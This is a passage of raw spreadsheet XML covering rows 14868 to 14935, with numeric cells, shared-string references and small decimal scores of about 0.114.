      <c r="C14868" s="2" t="s">
        <v>14334</v>
      </c>
      <c r="D14868" s="2">
        <v>1.0</v>
      </c>
      <c r="E14868" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14868" s="2">
        <v>0.1142557651991614</v>
      </c>
    </row>
    <row r="14869" ht="15.75" customHeight="1">
      <c r="A14869" s="1">
        <v>127.0</v>
      </c>
      <c r="B14869" s="2">
        <v>1.3169714E7</v>
      </c>
      <c r="C14869" s="2" t="s">
        <v>14335</v>
      </c>
      <c r="D14869" s="2">
        <v>1.0</v>
      </c>
      <c r="E14869" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14869" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="14870" ht="15.75" customHeight="1">
      <c r="A14870" s="1">
        <v>1235.0</v>
      </c>
      <c r="B14870" s="2">
        <v>2.5084907E7</v>
      </c>
      <c r="C14870" s="2" t="s">
        <v>14336</v>
      </c>
      <c r="D14870" s="2">
        <v>1.0</v>
      </c>
      <c r="E14870" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14870" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="14871" ht="15.75" customHeight="1">
      <c r="A14871" s="1">
        <v>1236.0</v>
      </c>
      <c r="B14871" s="2">
        <v>2.5084907E7</v>
      </c>
      <c r="C14871" s="2" t="s">
        <v>14337</v>
      </c>
      <c r="D14871" s="2">
        <v>1.0</v>
      </c>
      <c r="E14871" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14871" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="14872" ht="15.75" customHeight="1">
      <c r="A14872" s="1">
        <v>1967.0</v>
      </c>
      <c r="B14872" s="2">
        <v>3.0361166E7</v>
      </c>
      <c r="C14872" s="2" t="s">
        <v>14338</v>
      </c>
      <c r="D14872" s="2">
        <v>1.0</v>
      </c>
      <c r="E14872" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14872" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="14873" ht="15.75" customHeight="1">
      <c r="A14873" s="1">
        <v>1994.0</v>
      </c>
      <c r="B14873" s="2">
        <v>3.0531423E7</v>
      </c>
      <c r="C14873" s="2" t="s">
        <v>14339</v>
      </c>
      <c r="D14873" s="2">
        <v>1.0</v>
      </c>
      <c r="E14873" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14873" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="14874" ht="15.75" customHeight="1">
      <c r="A14874" s="1">
        <v>2096.0</v>
      </c>
      <c r="B14874" s="2">
        <v>3.1302903E7</v>
      </c>
      <c r="C14874" s="2" t="s">
        <v>14340</v>
      </c>
      <c r="D14874" s="2">
        <v>1.0</v>
      </c>
      <c r="E14874" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14874" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="14875" ht="15.75" customHeight="1">
      <c r="A14875" s="1">
        <v>2102.0</v>
      </c>
      <c r="B14875" s="2">
        <v>3.1306336E7</v>
      </c>
      <c r="C14875" s="2" t="s">
        <v>14341</v>
      </c>
      <c r="D14875" s="2">
        <v>1.0</v>
      </c>
      <c r="E14875" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14875" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="14876" ht="15.75" customHeight="1">
      <c r="A14876" s="1">
        <v>2582.0</v>
      </c>
      <c r="B14876" s="2">
        <v>3.4299875E7</v>
      </c>
      <c r="C14876" s="2" t="s">
        <v>14342</v>
      </c>
      <c r="D14876" s="2">
        <v>1.0</v>
      </c>
      <c r="E14876" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14876" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="14877" ht="15.75" customHeight="1">
      <c r="A14877" s="1">
        <v>3803.0</v>
      </c>
      <c r="B14877" s="2">
        <v>3.9993357E7</v>
      </c>
      <c r="C14877" s="2" t="s">
        <v>14343</v>
      </c>
      <c r="D14877" s="2">
        <v>1.0</v>
      </c>
      <c r="E14877" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14877" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="14878" ht="15.75" customHeight="1">
      <c r="A14878" s="1">
        <v>3836.0</v>
      </c>
      <c r="B14878" s="2">
        <v>4.0203339E7</v>
      </c>
      <c r="C14878" s="2" t="s">
        <v>14344</v>
      </c>
      <c r="D14878" s="2">
        <v>1.0</v>
      </c>
      <c r="E14878" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14878" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="14879" ht="15.75" customHeight="1">
      <c r="A14879" s="1">
        <v>4615.0</v>
      </c>
      <c r="B14879" s="2">
        <v>4.2915561E7</v>
      </c>
      <c r="C14879" s="2" t="s">
        <v>14345</v>
      </c>
      <c r="D14879" s="2">
        <v>1.0</v>
      </c>
      <c r="E14879" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14879" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="14880" ht="15.75" customHeight="1">
      <c r="A14880" s="1">
        <v>4679.0</v>
      </c>
      <c r="B14880" s="2">
        <v>4.3184224E7</v>
      </c>
      <c r="C14880" s="2" t="s">
        <v>14346</v>
      </c>
      <c r="D14880" s="2">
        <v>1.0</v>
      </c>
      <c r="E14880" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14880" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="14881" ht="15.75" customHeight="1">
      <c r="A14881" s="1">
        <v>4912.0</v>
      </c>
      <c r="B14881" s="2">
        <v>4.3922036E7</v>
      </c>
      <c r="C14881" s="2" t="s">
        <v>14347</v>
      </c>
      <c r="D14881" s="2">
        <v>1.0</v>
      </c>
      <c r="E14881" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14881" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="14882" ht="15.75" customHeight="1">
      <c r="A14882" s="1">
        <v>5630.0</v>
      </c>
      <c r="B14882" s="2">
        <v>4.620992E7</v>
      </c>
      <c r="C14882" s="2" t="s">
        <v>14348</v>
      </c>
      <c r="D14882" s="2">
        <v>1.0</v>
      </c>
      <c r="E14882" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14882" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="14883" ht="15.75" customHeight="1">
      <c r="A14883" s="1">
        <v>6212.0</v>
      </c>
      <c r="B14883" s="2">
        <v>4.7995548E7</v>
      </c>
      <c r="C14883" s="2" t="s">
        <v>14349</v>
      </c>
      <c r="D14883" s="2">
        <v>1.0</v>
      </c>
      <c r="E14883" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14883" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="14884" ht="15.75" customHeight="1">
      <c r="A14884" s="1">
        <v>6998.0</v>
      </c>
      <c r="B14884" s="2">
        <v>5.0077526E7</v>
      </c>
      <c r="C14884" s="2" t="s">
        <v>14350</v>
      </c>
      <c r="D14884" s="2">
        <v>1.0</v>
      </c>
      <c r="E14884" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14884" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="14885" ht="15.75" customHeight="1">
      <c r="A14885" s="1">
        <v>8599.0</v>
      </c>
      <c r="B14885" s="2">
        <v>5.4248572E7</v>
      </c>
      <c r="C14885" s="2" t="s">
        <v>14351</v>
      </c>
      <c r="D14885" s="2">
        <v>1.0</v>
      </c>
      <c r="E14885" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14885" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="14886" ht="15.75" customHeight="1">
      <c r="A14886" s="1">
        <v>8734.0</v>
      </c>
      <c r="B14886" s="2">
        <v>5.4526907E7</v>
      </c>
      <c r="C14886" s="2" t="s">
        <v>14352</v>
      </c>
      <c r="D14886" s="2">
        <v>1.0</v>
      </c>
      <c r="E14886" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14886" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="14887" ht="15.75" customHeight="1">
      <c r="A14887" s="1">
        <v>8938.0</v>
      </c>
      <c r="B14887" s="2">
        <v>5.487114E7</v>
      </c>
      <c r="C14887" s="2" t="s">
        <v>14353</v>
      </c>
      <c r="D14887" s="2">
        <v>1.0</v>
      </c>
      <c r="E14887" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14887" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="14888" ht="15.75" customHeight="1">
      <c r="A14888" s="1">
        <v>9172.0</v>
      </c>
      <c r="B14888" s="2">
        <v>5.5336854E7</v>
      </c>
      <c r="C14888" s="2" t="s">
        <v>14354</v>
      </c>
      <c r="D14888" s="2">
        <v>1.0</v>
      </c>
      <c r="E14888" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14888" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="14889" ht="15.75" customHeight="1">
      <c r="A14889" s="1">
        <v>10023.0</v>
      </c>
      <c r="B14889" s="2">
        <v>5.7052515E7</v>
      </c>
      <c r="C14889" s="2" t="s">
        <v>14355</v>
      </c>
      <c r="D14889" s="2">
        <v>1.0</v>
      </c>
      <c r="E14889" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14889" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="14890" ht="15.75" customHeight="1">
      <c r="A14890" s="1">
        <v>10265.0</v>
      </c>
      <c r="B14890" s="2">
        <v>5.7581346E7</v>
      </c>
      <c r="C14890" s="2" t="s">
        <v>14356</v>
      </c>
      <c r="D14890" s="2">
        <v>1.0</v>
      </c>
      <c r="E14890" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14890" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="14891" ht="15.75" customHeight="1">
      <c r="A14891" s="1">
        <v>10861.0</v>
      </c>
      <c r="B14891" s="2">
        <v>1.6319565E7</v>
      </c>
      <c r="C14891" s="2" t="s">
        <v>14357</v>
      </c>
      <c r="D14891" s="2">
        <v>1.0</v>
      </c>
      <c r="E14891" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14891" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="14892" ht="15.75" customHeight="1">
      <c r="A14892" s="1">
        <v>11217.0</v>
      </c>
      <c r="B14892" s="2">
        <v>2.0235043E7</v>
      </c>
      <c r="C14892" s="2" t="s">
        <v>14358</v>
      </c>
      <c r="D14892" s="2">
        <v>1.0</v>
      </c>
      <c r="E14892" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14892" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="14893" ht="15.75" customHeight="1">
      <c r="A14893" s="1">
        <v>11887.0</v>
      </c>
      <c r="B14893" s="2">
        <v>2.5096267E7</v>
      </c>
      <c r="C14893" s="2" t="s">
        <v>14359</v>
      </c>
      <c r="D14893" s="2">
        <v>1.0</v>
      </c>
      <c r="E14893" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14893" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="14894" ht="15.75" customHeight="1">
      <c r="A14894" s="1">
        <v>11983.0</v>
      </c>
      <c r="B14894" s="2">
        <v>2.5846449E7</v>
      </c>
      <c r="C14894" s="2" t="s">
        <v>14360</v>
      </c>
      <c r="D14894" s="2">
        <v>1.0</v>
      </c>
      <c r="E14894" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14894" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="14895" ht="15.75" customHeight="1">
      <c r="A14895" s="1">
        <v>13300.0</v>
      </c>
      <c r="B14895" s="2">
        <v>3.4487023E7</v>
      </c>
      <c r="C14895" s="2" t="s">
        <v>14361</v>
      </c>
      <c r="D14895" s="2">
        <v>1.0</v>
      </c>
      <c r="E14895" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14895" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="14896" ht="15.75" customHeight="1">
      <c r="A14896" s="1">
        <v>14887.0</v>
      </c>
      <c r="B14896" s="2">
        <v>4.1127042E7</v>
      </c>
      <c r="C14896" s="2" t="s">
        <v>14362</v>
      </c>
      <c r="D14896" s="2">
        <v>1.0</v>
      </c>
      <c r="E14896" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14896" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="14897" ht="15.75" customHeight="1">
      <c r="A14897" s="1">
        <v>15617.0</v>
      </c>
      <c r="B14897" s="2">
        <v>4.3549095E7</v>
      </c>
      <c r="C14897" s="2" t="s">
        <v>14363</v>
      </c>
      <c r="D14897" s="2">
        <v>1.0</v>
      </c>
      <c r="E14897" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14897" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="14898" ht="15.75" customHeight="1">
      <c r="A14898" s="1">
        <v>16662.0</v>
      </c>
      <c r="B14898" s="2">
        <v>4.7238889E7</v>
      </c>
      <c r="C14898" s="2" t="s">
        <v>14364</v>
      </c>
      <c r="D14898" s="2">
        <v>1.0</v>
      </c>
      <c r="E14898" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14898" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="14899" ht="15.75" customHeight="1">
      <c r="A14899" s="1">
        <v>16916.0</v>
      </c>
      <c r="B14899" s="2">
        <v>4.8135336E7</v>
      </c>
      <c r="C14899" s="2" t="s">
        <v>14365</v>
      </c>
      <c r="D14899" s="2">
        <v>1.0</v>
      </c>
      <c r="E14899" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14899" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="14900" ht="15.75" customHeight="1">
      <c r="A14900" s="1">
        <v>18401.0</v>
      </c>
      <c r="B14900" s="2">
        <v>5.263546E7</v>
      </c>
      <c r="C14900" s="2" t="s">
        <v>14366</v>
      </c>
      <c r="D14900" s="2">
        <v>1.0</v>
      </c>
      <c r="E14900" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14900" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="14901" ht="15.75" customHeight="1">
      <c r="A14901" s="1">
        <v>19631.0</v>
      </c>
      <c r="B14901" s="2">
        <v>5.6278179E7</v>
      </c>
      <c r="C14901" s="2" t="s">
        <v>14367</v>
      </c>
      <c r="D14901" s="2">
        <v>1.0</v>
      </c>
      <c r="E14901" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14901" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="14902" ht="15.75" customHeight="1">
      <c r="A14902" s="1">
        <v>19678.0</v>
      </c>
      <c r="B14902" s="2">
        <v>5.6432101E7</v>
      </c>
      <c r="C14902" s="2" t="s">
        <v>14368</v>
      </c>
      <c r="D14902" s="2">
        <v>1.0</v>
      </c>
      <c r="E14902" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14902" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="14903" ht="15.75" customHeight="1">
      <c r="A14903" s="1">
        <v>20302.0</v>
      </c>
      <c r="B14903" s="2">
        <v>1.1317909E7</v>
      </c>
      <c r="C14903" s="2" t="s">
        <v>14369</v>
      </c>
      <c r="D14903" s="2">
        <v>1.0</v>
      </c>
      <c r="E14903" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14903" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="14904" ht="15.75" customHeight="1">
      <c r="A14904" s="1">
        <v>21292.0</v>
      </c>
      <c r="B14904" s="2">
        <v>2.0520358E7</v>
      </c>
      <c r="C14904" s="2" t="s">
        <v>14370</v>
      </c>
      <c r="D14904" s="2">
        <v>1.0</v>
      </c>
      <c r="E14904" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14904" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="14905" ht="15.75" customHeight="1">
      <c r="A14905" s="1">
        <v>23142.0</v>
      </c>
      <c r="B14905" s="2">
        <v>5.1603412E7</v>
      </c>
      <c r="C14905" s="2" t="s">
        <v>14371</v>
      </c>
      <c r="D14905" s="2">
        <v>1.0</v>
      </c>
      <c r="E14905" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14905" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="14906" ht="15.75" customHeight="1">
      <c r="A14906" s="1">
        <v>23221.0</v>
      </c>
      <c r="B14906" s="2">
        <v>5279557.0</v>
      </c>
      <c r="C14906" s="2" t="s">
        <v>14372</v>
      </c>
      <c r="D14906" s="2">
        <v>1.0</v>
      </c>
      <c r="E14906" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14906" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="14907" ht="15.75" customHeight="1">
      <c r="A14907" s="1">
        <v>24186.0</v>
      </c>
      <c r="B14907" s="2">
        <v>1.0266525E7</v>
      </c>
      <c r="C14907" s="2" t="s">
        <v>14373</v>
      </c>
      <c r="D14907" s="2">
        <v>1.0</v>
      </c>
      <c r="E14907" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14907" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="14908" ht="15.75" customHeight="1">
      <c r="A14908" s="1">
        <v>24528.0</v>
      </c>
      <c r="B14908" s="2">
        <v>1.1178872E7</v>
      </c>
      <c r="C14908" s="2" t="s">
        <v>14374</v>
      </c>
      <c r="D14908" s="2">
        <v>1.0</v>
      </c>
      <c r="E14908" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14908" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="14909" ht="15.75" customHeight="1">
      <c r="A14909" s="1">
        <v>24574.0</v>
      </c>
      <c r="B14909" s="2">
        <v>1.1318584E7</v>
      </c>
      <c r="C14909" s="2" t="s">
        <v>14375</v>
      </c>
      <c r="D14909" s="2">
        <v>1.0</v>
      </c>
      <c r="E14909" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14909" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="14910" ht="15.75" customHeight="1">
      <c r="A14910" s="1">
        <v>25043.0</v>
      </c>
      <c r="B14910" s="2">
        <v>1.2845577E7</v>
      </c>
      <c r="C14910" s="2" t="s">
        <v>14376</v>
      </c>
      <c r="D14910" s="2">
        <v>1.0</v>
      </c>
      <c r="E14910" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14910" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="14911" ht="15.75" customHeight="1">
      <c r="A14911" s="1">
        <v>25643.0</v>
      </c>
      <c r="B14911" s="2">
        <v>1.451802E7</v>
      </c>
      <c r="C14911" s="2" t="s">
        <v>14377</v>
      </c>
      <c r="D14911" s="2">
        <v>1.0</v>
      </c>
      <c r="E14911" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14911" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="14912" ht="15.75" customHeight="1">
      <c r="A14912" s="1">
        <v>25809.0</v>
      </c>
      <c r="B14912" s="2">
        <v>1.4743322E7</v>
      </c>
      <c r="C14912" s="2" t="s">
        <v>14378</v>
      </c>
      <c r="D14912" s="2">
        <v>1.0</v>
      </c>
      <c r="E14912" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14912" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="14913" ht="15.75" customHeight="1">
      <c r="A14913" s="1">
        <v>26662.0</v>
      </c>
      <c r="B14913" s="2">
        <v>1.8059799E7</v>
      </c>
      <c r="C14913" s="2" t="s">
        <v>14379</v>
      </c>
      <c r="D14913" s="2">
        <v>1.0</v>
      </c>
      <c r="E14913" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14913" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="14914" ht="15.75" customHeight="1">
      <c r="A14914" s="1">
        <v>26762.0</v>
      </c>
      <c r="B14914" s="2">
        <v>1.8457204E7</v>
      </c>
      <c r="C14914" s="2" t="s">
        <v>14380</v>
      </c>
      <c r="D14914" s="2">
        <v>1.0</v>
      </c>
      <c r="E14914" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14914" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="14915" ht="15.75" customHeight="1">
      <c r="A14915" s="1">
        <v>26923.0</v>
      </c>
      <c r="B14915" s="2">
        <v>1.9427156E7</v>
      </c>
      <c r="C14915" s="2" t="s">
        <v>14381</v>
      </c>
      <c r="D14915" s="2">
        <v>1.0</v>
      </c>
      <c r="E14915" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14915" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="14916" ht="15.75" customHeight="1">
      <c r="A14916" s="1">
        <v>27105.0</v>
      </c>
      <c r="B14916" s="2">
        <v>2.0601211E7</v>
      </c>
      <c r="C14916" s="2" t="s">
        <v>14382</v>
      </c>
      <c r="D14916" s="2">
        <v>1.0</v>
      </c>
      <c r="E14916" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14916" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="14917" ht="15.75" customHeight="1">
      <c r="A14917" s="1">
        <v>27203.0</v>
      </c>
      <c r="B14917" s="2">
        <v>2.0942222E7</v>
      </c>
      <c r="C14917" s="2" t="s">
        <v>14383</v>
      </c>
      <c r="D14917" s="2">
        <v>1.0</v>
      </c>
      <c r="E14917" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14917" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="14918" ht="15.75" customHeight="1">
      <c r="A14918" s="1">
        <v>27736.0</v>
      </c>
      <c r="B14918" s="2">
        <v>2.3080437E7</v>
      </c>
      <c r="C14918" s="2" t="s">
        <v>14384</v>
      </c>
      <c r="D14918" s="2">
        <v>1.0</v>
      </c>
      <c r="E14918" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14918" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="14919" ht="15.75" customHeight="1">
      <c r="A14919" s="1">
        <v>28802.0</v>
      </c>
      <c r="B14919" s="2">
        <v>2.865456E7</v>
      </c>
      <c r="C14919" s="2" t="s">
        <v>14385</v>
      </c>
      <c r="D14919" s="2">
        <v>1.0</v>
      </c>
      <c r="E14919" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14919" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="14920" ht="15.75" customHeight="1">
      <c r="A14920" s="1">
        <v>28862.0</v>
      </c>
      <c r="B14920" s="2">
        <v>2.9059744E7</v>
      </c>
      <c r="C14920" s="2" t="s">
        <v>14373</v>
      </c>
      <c r="D14920" s="2">
        <v>1.0</v>
      </c>
      <c r="E14920" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14920" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="14921" ht="15.75" customHeight="1">
      <c r="A14921" s="1">
        <v>28871.0</v>
      </c>
      <c r="B14921" s="2">
        <v>2.9132996E7</v>
      </c>
      <c r="C14921" s="2" t="s">
        <v>14386</v>
      </c>
      <c r="D14921" s="2">
        <v>1.0</v>
      </c>
      <c r="E14921" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14921" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="14922" ht="15.75" customHeight="1">
      <c r="A14922" s="1">
        <v>28872.0</v>
      </c>
      <c r="B14922" s="2">
        <v>2.9132996E7</v>
      </c>
      <c r="C14922" s="2" t="s">
        <v>14387</v>
      </c>
      <c r="D14922" s="2">
        <v>1.0</v>
      </c>
      <c r="E14922" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14922" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="14923" ht="15.75" customHeight="1">
      <c r="A14923" s="1">
        <v>29165.0</v>
      </c>
      <c r="B14923" s="2">
        <v>3.0627426E7</v>
      </c>
      <c r="C14923" s="2" t="s">
        <v>14388</v>
      </c>
      <c r="D14923" s="2">
        <v>1.0</v>
      </c>
      <c r="E14923" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14923" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="14924" ht="15.75" customHeight="1">
      <c r="A14924" s="1">
        <v>29177.0</v>
      </c>
      <c r="B14924" s="2">
        <v>3.0708875E7</v>
      </c>
      <c r="C14924" s="2" t="s">
        <v>14389</v>
      </c>
      <c r="D14924" s="2">
        <v>1.0</v>
      </c>
      <c r="E14924" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14924" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="14925" ht="15.75" customHeight="1">
      <c r="A14925" s="1">
        <v>29471.0</v>
      </c>
      <c r="B14925" s="2">
        <v>3.2364429E7</v>
      </c>
      <c r="C14925" s="2" t="s">
        <v>14390</v>
      </c>
      <c r="D14925" s="2">
        <v>1.0</v>
      </c>
      <c r="E14925" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14925" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="14926" ht="15.75" customHeight="1">
      <c r="A14926" s="1">
        <v>29740.0</v>
      </c>
      <c r="B14926" s="2">
        <v>3.4645254E7</v>
      </c>
      <c r="C14926" s="2" t="s">
        <v>14391</v>
      </c>
      <c r="D14926" s="2">
        <v>1.0</v>
      </c>
      <c r="E14926" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14926" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="14927" ht="15.75" customHeight="1">
      <c r="A14927" s="1">
        <v>30001.0</v>
      </c>
      <c r="B14927" s="2">
        <v>3612938.0</v>
      </c>
      <c r="C14927" s="2" t="s">
        <v>14392</v>
      </c>
      <c r="D14927" s="2">
        <v>1.0</v>
      </c>
      <c r="E14927" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14927" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="14928" ht="15.75" customHeight="1">
      <c r="A14928" s="1">
        <v>31214.0</v>
      </c>
      <c r="B14928" s="2">
        <v>4926389.0</v>
      </c>
      <c r="C14928" s="2" t="s">
        <v>14393</v>
      </c>
      <c r="D14928" s="2">
        <v>1.0</v>
      </c>
      <c r="E14928" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14928" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="14929" ht="15.75" customHeight="1">
      <c r="A14929" s="1">
        <v>31401.0</v>
      </c>
      <c r="B14929" s="2">
        <v>4999496.0</v>
      </c>
      <c r="C14929" s="2" t="s">
        <v>14394</v>
      </c>
      <c r="D14929" s="2">
        <v>1.0</v>
      </c>
      <c r="E14929" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14929" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="14930" ht="15.75" customHeight="1">
      <c r="A14930" s="1">
        <v>31653.0</v>
      </c>
      <c r="B14930" s="2">
        <v>5.1603411E7</v>
      </c>
      <c r="C14930" s="2" t="s">
        <v>14371</v>
      </c>
      <c r="D14930" s="2">
        <v>1.0</v>
      </c>
      <c r="E14930" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14930" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="14931" ht="15.75" customHeight="1">
      <c r="A14931" s="1">
        <v>31856.0</v>
      </c>
      <c r="B14931" s="2">
        <v>5279556.0</v>
      </c>
      <c r="C14931" s="2" t="s">
        <v>14372</v>
      </c>
      <c r="D14931" s="2">
        <v>1.0</v>
      </c>
      <c r="E14931" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14931" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="14932" ht="15.75" customHeight="1">
      <c r="A14932" s="1">
        <v>9815.0</v>
      </c>
      <c r="B14932" s="2">
        <v>5.6611893E7</v>
      </c>
      <c r="C14932" s="2" t="s">
        <v>14395</v>
      </c>
      <c r="D14932" s="2">
        <v>1.0</v>
      </c>
      <c r="E14932" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14932" s="2">
        <v>0.1141414141414141</v>
      </c>
    </row>
    <row r="14933" ht="15.75" customHeight="1">
      <c r="A14933" s="1">
        <v>11349.0</v>
      </c>
      <c r="B14933" s="2">
        <v>2.1237303E7</v>
      </c>
      <c r="C14933" s="2" t="s">
        <v>14396</v>
      </c>
      <c r="D14933" s="2">
        <v>1.0</v>
      </c>
      <c r="E14933" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14933" s="2">
        <v>0.1141414141414141</v>
      </c>
    </row>
    <row r="14934" ht="15.75" customHeight="1">
      <c r="A14934" s="1">
        <v>12218.0</v>
      </c>
      <c r="B14934" s="2">
        <v>2.7720818E7</v>
      </c>
      <c r="C14934" s="2" t="s">
        <v>14397</v>
      </c>
      <c r="D14934" s="2">
        <v>1.0</v>
      </c>
      <c r="E14934" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14934" s="2">
        <v>0.1141414141414141</v>
      </c>
    </row>
    <row r="14935" ht="15.75" customHeight="1">
      <c r="A14935" s="1">
        <v>27985.0</v>
      </c>
      <c r="B14935" s="2">
        <v>2.4042494E7</v>
      </c>
